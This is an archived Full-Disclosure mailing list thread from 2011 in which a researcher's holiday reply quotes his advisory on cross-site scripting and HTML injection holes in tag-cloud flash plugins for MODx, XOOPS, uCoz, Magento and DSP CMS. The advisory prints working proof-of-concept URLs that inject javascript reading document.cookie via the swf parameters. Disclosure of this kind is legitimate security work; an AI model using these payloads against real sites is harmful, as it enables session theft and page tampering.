| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 30 Dec 2011 23:55:03 +0200 From: "MustLive" <mustlive@...security.com.ua> To: "Antony widmal" <antony.widmal@...il.com> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS Hello Antony! You are welcome. All those XSS vulnerabilities in 34 millions flash files, and all those vulnerable plugins for different engines with vulnerable swf-file, which I've wrote about during 2010-2011, including last five plugins, and those vulnerabilities in TinyMCE (on tens millions of web sites, only on WordPress there are more then 67 millions of affected web sites), and all those vulnerabilities disclosed by me in 2011, and that new version of plugin Register Plus Redux (with fixed all holes), which I wrote about in the last advisory - all these are my presents. So Merry Christmas and Happy New Year! Of course I wish good music for everyone for holidays. Like this one: http://soundcloud.com/mustlive/mega-mix-4 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- From: Antony widmal To: MustLive Cc: submissions@...ketstormsecurity.org ; full-disclosure@...ts.grok.org.uk Sent: Tuesday, December 27, 2011 12:44 AM Subject: Re: [Full-disclosure] Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS 10 million XSS ! Thank you Santa. 2011/12/26 MustLive <mustlive@...security.com.ua> Hello list! Besides tens millions of vulnerable web sites with affected flash files and vulnerable multiple plugins for different engines, which I've wrote about earlier, there are a lot of other vulnerable plugins. Here are new ones (some of them are vulnerable to two XSS holes). There are Cross-Site Scripting vulnerabilities in plugins for engines MODx CMS, XOOPS, uCoz, Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such plugins for other engines can be vulnerable. This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed in 2009 (http://securityvulns.com/Wdocument842.html). Because these plugins are using tagcloud.swf made by author of WP-Cumulus. About such vulnerabilities I wrote in 2009-2011, particularly about millions of flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article XSS vulnerabilities in 34 millions flash files (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html). ------------------------- Affected products: ------------------------- Vulnerable are all versions of Tagcloud for MODx CMS. Vulnerable is Сumulus for XOOPS 1.0, which is also included in ExtendedPackRU for XOOPS. Vulnerable are all versions of uCoz-Cumulus for uCoz. Vulnerable are all versions of Cumulus Tagcloud for Magento. Vulnerable are all versions of Сumulus for DSP CMS. Some of these plugins are vulnerable to one and some to two XSS holes - as to first hole in WP-Cumulus, which I've disclosed in 2009, as to second hole, which I've disclosed in 2011. Besides these ones and those which I've disclosed in 2009-2011, a lot of other such plugins for other engines can be vulnerable. ---------- Details: ---------- XSS (WASC-08): Tagcloud for MODx CMS: http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Сumulus for XOOPS: http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E uCoz-Cumulus for uCoz: http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Cumulus Tagcloud for Magento: http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml Via parameters mode and xmlpath. Сumulus for DSP CMS: http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E Code will execute after click. It's strictly social XSS (http://websecurity.com.ua/5476/). Also it's possible to conduct (like in WP-Cumulus) HTML Injection attack. ------------------------------------------------- Plugins with fixed version of swf-file: ------------------------------------------------- Because in November 2009, after my informing, Roy Tanck (developer of WP-Cumulus) fixed only XSS vector, but not HTML Injection vector, it's still possible to conduct HTML Injection attacks (for injecting arbitrary links) to all versions of this swf-file (which can be found under name tagcloud.swf and other names). Including fixed version of the swf-file, with fixed XSS hole. So all those plugins, which developers fixed this vulnerability (after my informing or by informing from Roy or other people) by updating swf-file, are still vulnerable to HTML Injection. These five plugins are using non-fixed version of swf-file. I mentioned about these vulnerabilities at my site: http://websecurity.com.ua/5601/ Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists